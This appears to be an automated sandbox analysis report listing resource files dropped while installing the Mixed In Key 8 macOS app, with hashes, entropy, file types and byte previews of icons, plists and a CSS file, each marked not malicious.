Preview:	.PNG........IHDR...X...B.....u..}....sRGB.........IDATx...1n\e......l.2K.D....V..)R...{A..F.uOI.]0.K.M,.o..8.d.M.t...X._...t}.v].k]~.\|.....}.._............_...\.e.y]./......o..i>.y....'N#.....6"..x.n`...$7.....3.).M...f..xJr.....:....t.o`...$7.....3.).M...f..xJr.....:....t.o`...$7.....3.).M...f..xJr.....:....t.o`...$7.....3.).M...f..xJr.....9...g$.......4....k.........X..?......_/p<\a..;q..S..8?.[..w......O^_/...8>.._.[........3.\........X...:.?..g.......q.3x.N........y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y.....y..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_lxodma Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=44, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=Serato_Icon@2x.png, orientation=upper-left, width=44
Category:	dropped
Size (bytes):	11030
Entropy (8bit):	7.092290353802276
Encrypted:	false
SSDEEP:	192:lxvEds3LS/3BUkSYNMtKwgpPmthTkvYNMtKwy:lOdGS/3B3SYNg7g5mth4vYNg7y
MD5:	EDB376A5695D51771A8CD8C73596CF70
SHA1:	9CEF62D5C961054036FC404A1FB3F5A395870F0B
SHA-256:	A16F81CF335A2673F56404B910F8D8507B6D76B2B01FC642766E6C55224D91B0
SHA-512:	977DCE12F8C7B906D87573356C403F47385C95ABCB594254610D46B1D6787B2C2DADA0BB788B0C8EF40F8343D6F1348FEC081440EF4CD8E538E583BDEE4C0BC4
Malicious:	false
Preview:	MM....J.............>.......................,...........,....2016:07:27 02:44:58..?.@.$....BaP.d6...DbQ8......cQ..v=....l.~M...HPQ..I..AB......nAY.U...'..FB.<..#....M"_.,AJ.Qm2&.....T.G..)TX...C.R..T...VwA].Q5Y/.?R.rjE....Ao.8. ..O...(.8..)N.BV.j.c ..#..b.,0..$........._..)G.5<...B.T..gSK.YpZMTB.....(.r.D..a.....A9.E.+....#.k...H[AI8.o>....,.+.....V..T;..8MC..$I!X..o...>.{....j..Ah)Z...S..n...)...W9njLd .c>...C.P..>.A.....=$.......W..-......H(..jQ\|...!....Lc.......b.:..j.....,.Cr<;.<.JI. ...%)E...'.I...k0t........(6..P.6..<..:.lAPb.&.E... ...O.C.. ...P.C....i...A.B.l........7.......J.\)...J..B.).S..g........B...).Y!...b#..8W4.x.L.j8...t....D..5...Q..$.....F..n......."......A..Z.5....I.h)x...P..Qh%.{O0..k.....a....@T...0.....6.EH%...jP.GH!....M.C.n_...P..U.%T..2.5... ....P.Ph%..[J...Rr.ok.P.lh&...RW.eu...!.....h(......h-...JV..). .z..:..(c..!%.....K....P;.e\|...!.j.z)....q.H.../h..JQ.....Sp...p"JD2.T.!.......Q.L...{)@_`.ch`V...Av...f.....>

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_lzJMD3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 437 x 322, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	16103
Entropy (8bit):	7.846252129656133
Encrypted:	false
SSDEEP:	384:bBjm1lLmJ27glsW7LwwMkSTwWfCwOSnmOQM43+l369X:AeJ27g5wkcwkCImpLuKX
MD5:	8E9A5DF26B0A055B7F1A78E44D86B68C
SHA1:	FC69A4B2BEE7E105A72574FA94BED085C4076D97
SHA-256:	8FAD8E958D11C71BDAB7586945FF44B56449FDB453451D7AC2FF75736ACBE02E
SHA-512:	F29642ED43199D6D669F4DCF75029A1230D26FBB9092906A3E32CDFA5ADCBD063AB3C835D50ABAB65B6FCB95727FB196DCE7B17966C3DB2D00983E35BB99851E
Malicious:	false
Preview:	.PNG........IHDR.......B.....v=C\|....sRGB.......>.IDATx..;o.G..O../...B...8S..Cp..,..d/6....J..Sl.....W.....B0vCe.....y./..~M.h.]="..6........S...:.w..8N...7.m.\.no...g.9.{....n..-......ma.K..v..?..G..f.[%q.z.W{47..E...?..n.uO..W..b.......l.7l.%.q~...}...s.\.vF...........\|r...nx.3g[.f...........z.2\|..\.bK+..I.....N.v.......%.R.7.._?t...zg.ak...+...7..5g'.{.m.7.so....7\|..Q;..QW..s.{...f.{N...`[.....K.Y...m...M...5.^..o.wkE....~...UK.g_Y.b...W.k.?..j...=~.W.T.7R.Z..[.!g...-..U.U...w....;.{F*.b......9.l..u;$..\|..._u.E.....=+..-._..E.].;~.N.A1......G...q..~0n....k_..^.5..?..e'.{.....m..m.T.c7tU.....6.k...O,UmJ.wx.^-]p/...>...0v..}.m.....lk..-.\..E...?~.....O...W..cG:v....6........m...?.n.N.w.z{...{...jOm...>.f...36.k...:...k....T..&T.@.=.R51k..`...;v..5........ @..G..ht..#...A ..h......=....{.P...~.X@..5..j...=....ID..z ..z.....4..!.+..2P...V.{=.....=.....G.D...~.4.8.<....{.e[..........E.#..0qh........R..AO..D..K.WQ..wi..D....Q.d

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_mM2ro1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=23, height=74, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=button-divider@2x.png, orientation=upper-left, width=4
Category:	dropped
Size (bytes):	8972
Entropy (8bit):	6.836398755207312
Encrypted:	false
SSDEEP:	96:4o5HhLTkCQkN26MT0D5MdtbZPAVwzVfebdmHL1kCDy+N26MT0D5MdtbZPAVwzV0:B9Tk1YNMtKwops1kG2YNMtKwy
MD5:	812F3AB2AF92237E90E557592AB7EECB
SHA1:	4A946B9B4CFFE51EA7B4DC1F37E3B4CE2186801B
SHA-256:	A3D71A2A842F2FDA4BEB67AA93FF1400200707E00F9037FE3898BD7CC9DCB9C8
SHA-512:	E2D30318A149031F44CBB80A99B0C73115AEC1E92F4F4CCB8FFD0501C27ABDEC7DF0243CF730BE4B247DDD9D6ED229A7698FF1854DEF4ADD197177F15F6C522A
Malicious:	false
Preview:	MM.*...\.............>...................................J....2016:07:01 15:59:38../..P...1.A@.($....B..,F.....P..j/..."r.l.9....<ZM..J.....e1..2..I4...t...gF.Oh.y}..E..&.U".N....]&.@..j.....0...O...`.........N.....u.<..b....N..0.../N......J.6....QFj.4..@.)p.N..[%.........M.@\".S...p.B..S.B..8R.....u8N......m8J......e8F....>..t-.y..........................J.........................................................................R.................................J.........................v...........~.............(...........1...........2...........=...........S......................i...........s.....H....................................button-divider@2x.png.tiffutil v310.2016:07:01 15:59:38.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_mRuRe4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 30 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2813
Entropy (8bit):	7.909683961433022
Encrypted:	false
SSDEEP:	48:PCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/65p:PCt7IIMRfwnXz+npN8IgXBsvuSX
MD5:	21D7C4DD99961496E8F8F52F3D242619
SHA1:	55108EB8E48FAE7AAFE7DCF44FF28DD946396053
SHA-256:	7EC92ED78741EDD37CA1309F0434FFD074424A340C42472B8541552E7F474B74
SHA-512:	F13E6BF6F358894531BFF5884FFCB1C0ADB933011560C9C7014DACC8E3FCC4F766F513B16245BD2D47AFE9E8BA737C5CD9B68DF973D26A431EB44B141E1DA44B
Malicious:	false
Preview:	.PNG........IHDR.......(.....fq.E...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_qUNhri Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	4.825623810901468
Encrypted:	false
SSDEEP:	24:2dfyiwGDBUXRQI9Kk4ZhkBry4n3wCt3wCmn2fnhCGRJmDSJ:cfy4D2X2sK/rK3wCSC42//RcD8
MD5:	9A2B82DA3F108EA900D5BEEECA152F91
SHA1:	68BC88D1397E061E63FF8D3083003265040738A3
SHA-256:	1A7F3FBD2C4F4FCA70986E1B508267B6760207218BE32DA6C23F1D829201B9F6
SHA-512:	0836A92361AE94AD4BD9985AE88EB4D6904AEBB435BC284170D6FC5A78F9217B8328EDFE6EE29C71E377AC0CE7A3D5FFB6B6B7958B1922605D2F8FB3AD646346
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>VIPCode</key>..<string></string>..<key>user email</key>..<string></string>..<key>volume</key>..<real>1</real>..<key>PianoVolume</key>..<integer>1</integer>..<key>PianoMode</key>..<integer>0</integer>..<key>elite</key>..<true/>..<key>show audio quality warnings</key>..<true/>..<key>automatically rename files</key>..<false/>..<key>show song drag dialog</key>..<true/>..<key>file renaming format</key>..<integer>1</integer>..<key>id3 tag option</key>..<integer>2</integer>..<key>id3 tag value</key>..<integer>2</integer>..<key>key view option</key>..<integer>0</integer>..<key>ReferenceKeyOption</key>..<integer>0</integer>..<key>tempo precision</key>..<integer>0</integer>..<key>adjust tempo</key>..<true/>..<key>tempo minimum</key>..<integer>79</integer>..<key>tempo maximum</key>..<integer>192</integer>..<key>writes id3

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_qWY2Ul Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=44, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=Ableton_Icon@2x.png, orientation=upper-left, width=44
Category:	dropped
Size (bytes):	11080
Entropy (8bit):	7.095794726210357
Encrypted:	false
SSDEEP:	192:wuaug5nFqxK8AcyH5k9kYNMtKwoCt5lxhMkLYNMtKwy:haxFqxK8AcyCyYNg7Dt5lxhfLYNg7y
MD5:	82389DB380D37B21AC748073D664FB5C
SHA1:	CEB9DF3877B79F063188F19D747ACE0C14B167D8
SHA-256:	E12FD31D5CCD617AE18FBF794D827F65C3BEC979646BBD73D791638552F33BAF
SHA-512:	97AF4DE4969CE7E86A4BEBF28E27951C91F7747D38F2BFD7407D4E0298FA93D31BE34B211085858927B09442094E936B699FDB80AE09C28CF3AECA0FE7FDEF52
Malicious:	false
Preview:	MM....~.............>.......................,...........,....2016:07:27 02:44:26.....`.....B`..L".....0.F(..DcQx.b;....1..rG..Dc2HL........m ..cQ...!9.Og.P..e...@2..E..e..P..#..a"XHB.....0.t%..i.[p..F.<...jeN.(.P..t$..%.F...$.>.A.p.$%..[BV6H...$.O...=6......c4$....A8.f.....!.JZ....h9.n.9.Xc4..%.Y.k.\.f..m..a+..g-D...x}<..?BB..'.Z...!(.N....R.3..%..7B@.o...L!#....-.4.:....H..B...M.#<...(...>hx..H..1'..{#K....i......./...$.%B...y...I...HK.=....!!.... .z...H......../p&...Hk).1R..hI....$T.I.0...H.).(H.....'.%HL>.....5..b._.130......H_).(0.C(..N.!%....R..,.....\|....H....H."KT..5R.....I...%X.. .C1BC..E8Q.r.!%...?.B.&1...[.:..2(08..h4.S.2...HH..7..t...l.\4..7.........g...d].........(d..HV..!8.0..i.4.........H.U..BM..vDN.....h..R.T.'\|.D........D.8.3..8x...(hS.2....g .t0.#"..L.O!.'.R.0..63...R.H!0.j......O&8.!.h.j5......B..n....&...q2^.$...s...(..hMk..`.$.....n.3..]..O!.s....f{...]......$.wr.*..].=,.......Q.6S..t....hOC.c8.....[......<...({Iz5B../.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_sz3NIB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1452
Entropy (8bit):	7.159486487333368
Encrypted:	false
SSDEEP:	24:+/65YWuqylxbDv/yKwZMQDJYMc7IZadZct2sTwyWu2pTaBnGfJa9f+YZnwylnmiC:+/6zUvqhZMnoCa2sTwj+B99f++wmnmOy
MD5:	C9A2084C418E2829780356FB78448362
SHA1:	411674D48239D76928B93F1AA1CAEC3873C699F6
SHA-256:	D0D61DD6693AE4CAC74F81C7F02178D677D67FBF834401455F15D8A8D81A15BB
SHA-512:	E35A250E635449333689E02887714A17D49FD9D01CE265C3E732610E7951A9634931C63DCDF8C6DA9FC37F65C98EFAE483C9BA1F99FE709946C0DC9DB7BB4793
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 5.4.1</xmp:CreatorTool>. <xmp:ModifyDate>2016-06-28T14:28:49</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>........IDATX...N.@...Q. ..m..Jy.^ 5........<I..i.x.h.C....E.,...`...}...{.=.{<3.b..m6.%....,.....n..*...vj......]M>.....}..#.k..`....... .5.?.9....].....>.8O...s......R8..r..7.....(r..~8......g....,..!.o...6g.(.T..u.........b._<..."..>t...[......'.4!.3w.........)v..A...V..G..&...v

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_tClh4h Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 32 x 44, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	997
Entropy (8bit):	6.383790587992289
Encrypted:	false
SSDEEP:	24:0/65YWuqylxbDv/yKwZMQDJPMcgZan3gRJSlF7r1:0/6zUvqhZM7MgRMvN
MD5:	EE63E57C9E09D01292FEBD1174F070A6
SHA1:	30ED4218A21D092AB5F0BFDE1C5BFB2083629D23
SHA-256:	AE14CDE5F78D9B650477A99A4AFE8D37C623496815F5A04616DA7CBC140DA14C
SHA-512:	809D58D02526FA46A26E3A66F49E3F5C90924DD9C0240AD1316738C5A0AD267CBE845897D7AA4BDF67B5A729CEED81A24D8246D5F96EEC61C23B8748DF474150
Malicious:	false
Preview:	.PNG........IHDR... ...,.............sRGB.........pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 5.6.4</xmp:CreatorTool>. <xmp:ModifyDate>2017-04-14T14:55:29</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>...".....IDATX..=.. .....t..<.?S.. ..p.w=....".nM...&MCy.Q._...=(._.P.t..2.....)...........\(6.%cr....B..u.X..i&-.CS.....Ro.Lf..=... .u]/...\|2.....?@i.b[U.s.. ..............S..q..+(.k...I....Ix.......t.......0.k'&.{.W...B.....'\| ..... .d....2...z ...\|...Xv...T......^Q.S./......IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_tzlnd1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	5172
Entropy (8bit):	6.558977550874714
Encrypted:	false
SSDEEP:	96:vc91WKlIxatkaYi/3kazoWG9YTH1EHLbit2t1Ihvi10:vG1W1Wkal3kgG9YTH1B0IhP
MD5:	6A13C7C2BC1565C63B370711F55DBE1F
SHA1:	DD2BB386E50C6B2A7DAACCA9B1DF5BADB4FE66ED
SHA-256:	9DF4BBB5FB6CEC99D6D5E782420723FBE25D82CC95427B0E7C81F0D66E5F6CD0
SHA-512:	A47DB77001AC861249429A342734C8ACAEB33453EA46C5C2C81582A7D3521382563CC1487BF1828CC5535394B5D4B49A862F6D3A0734A80A9C24722D41AD5D33
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top.......q.......#.$....2.=.E.T.U.V.`.p.q.r.............................................................................)..4.5.6.:.;.<.@.E.F.J.O.P.U.V.[.\.a.b.g.h.m.n....................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....T.R.N.o...o.n.p.S.. ...!."[NSClassName...._.(_TtC10MixedInKey22TutorialViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...?.B.D.F.H.J.L.;..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....=.>..F... .G.H.I.J.K.L.M.N.O.P.Q.P.S_..NSOriginalClassNameZNSSubviews_..NSNextResponderXNSvFlags]NSNibTouchBar[NSFrameSize................<_.._TtC10MixedInKey12TutorialV

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_vPmEyO Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	3808
Entropy (8bit):	5.252982103180177
Encrypted:	false
SSDEEP:	48:sAqAeItbEKsxthY2eQ8Ovv8QAAOkVGU7+UhRKnHuV5llrfqgESO062WgpL14c/Na:pqItb4q/i3AFksC1jKnHuvugE+/h8Ltx
MD5:	41FEACAB6AC6F3756FF7A69B36582870
SHA1:	020B00230C07EADE7033FCD783A6D437AB832EFB
SHA-256:	229AB2959BB8F724BDBA9416C102791B8FC6FDD3DCBE49B5B37082A9361869E9
SHA-512:	C71ECF25E25507316AE3C8B6C75987516EF5C2FCB657CCB5AD5CD86948B6C470A7F629DECE79A408269F9CF5D0C42EBDEA49B1FBD57D286CB2411AFB61A888F0
Malicious:	false
Preview:	/..CSS for Mixed In Key top theme..Copyright 2008 - 2014 Mixed In Key LLC.. /..html {..height:70px;.}.body {..height:70px;..margin:0;..padding:0;..font:14px "Roboto";..background-color:rgb(0, 32, 78);..overflow:hidden;.}.#logo-left {..height:63px;..margin:0;..background:url("../images/mik-top-left.tiff") 15px 11px no-repeat;..background-size: 138px 52px;.}./#logo-right {..position:absolute; right:0; top:0;..height:88px;..width:459px;..margin-right:20px;..background:url("../images/mik-top-right.tiff") no-repeat;..background-size: 459px 88px;.}././* simulated tabs /./#menu {..position:absolute;..top:24px;..left:262px;..height:40px;..background:url("../images/top-menutheme.png") repeat-x;..border-left:1px solid #c8c8c8;.}.a.tab {..display:table-cell;..margin:0;..padding:13px 15px 12px 15px;..border-left:1px solid transparent;..border-right:1px solid #c8c8c8;..text-align:center;..text-decoration:none;..color:rgb(120, 120, 120);.}.a.tab:hover {..background:url("../images/top-tab-hover

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_xddmkx Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 180 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	64028
Entropy (8bit):	4.58202406646576
Encrypted:	false
SSDEEP:	384:eXE05WiA/RLzTBRMnRZQNkWLKY51B6vV+Gnb62j6bsWRTykunOodSSNjoO1k+bAg:035WiE/7N/XB695nGaWcmcSSNsOpsox
MD5:	A019EE1FBBF60977761F6F4B79C2BCBB
SHA1:	E84CB73B4408DBE78DA97636248615F960E0CB8F
SHA-256:	C1995A641D32BA154AE438480B985C8D6129BFDB0B038DD5B13889045F0151A4
SHA-512:	C563883DA83637B091D3E10766189D11A179A07D7265A09EA92F2A066C7B5CB1CD9C99D7B03EB34375D563ECF311D0CC9AC7A988E819918E41524EC15172BA74
Malicious:	false
Preview:	.PNG........IHDR.......2......$......pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_xhts3o Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 5 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2845
Entropy (8bit):	7.908364260501814
Encrypted:	false
SSDEEP:	48:eCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/6KB:eCt7IIMRfwnXz+npN8IgXBsvuSKB
MD5:	E909F95EBF82FDF40D95E5C5B732B3A7
SHA1:	7DA7FD7DB57D3200BD4AE30B11B020DFDF89318C
SHA-256:	F4A59C69FC547BC9AB11CE89759398BDC5A56CE72973CA0D0B746A4569BBB916
SHA-512:	3E6A2C9806D97B1162DBBAAD515FE44997635A25F941D5618BCAE0A484929D268894699900A9CDB16CD8BE743B5D3209EC37EC09CCA22C908CEC93300110469D
Malicious:	false
Preview:	.PNG........IHDR.......(......?.Z...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_yAcRjt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 56 x 60, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	548
Entropy (8bit):	7.504856942939381
Encrypted:	false
SSDEEP:	12:6v/7O0Rjst0vzlPDNQNDmCD22zvrj2TuL5CC+Ts+9F12fVAdxc:tesYQN6CPzvrj/tCC+Ts+9F09Adxc
MD5:	BE5DC62C237BEAE68FF7E8AE51353BB7
SHA1:	4CE0E9841287515186DAFB40766B48725231B39E
SHA-256:	3B966785A1A5DDE4BBC0CF9386DC506568D8BBDA66898160942546311FE7AC4C
SHA-512:	8944561C69DDEFFE5F6CD7B3117677CDC2D8279BC4AEDDD9EE3C0E570589AB932B79E2450651C62162C7410846639890AD1A533882E19FC0AC7F849A191B330E
Malicious:	false
Preview:	.PNG........IHDR...8...<.....3.y.....sRGB.........IDATh..ANB1.......@4.......n G...'....7..Q..&....>.G.Wh.u..L;3mg..-J...F]ZR.....C?4.......[..^&.%...b..v.Qw. ._VOI=+..%Ms.RE=.\|?4.T'......k.S.B...e.W:....St.Iu.t..s.Gd...\|..y6..:.3.W...A..T..R.q. ..AP9.....R%.J%.q. WB..A..8n..JH. (.....\.......A.+!U..Tr.7.r%.J..J..N_..5..GU.N.3{.{.Y.(.;..ME...gz......m:.rb/[M`...V.@...+..P.v.,.P.>..U.t;..N(....T...K'....s.*...............tkS=2.q.._}......B^.?P;.R.v......~.(.....}.x0....vp.o.......H...X.......T.......X4VKv&....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_z9ThQR Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
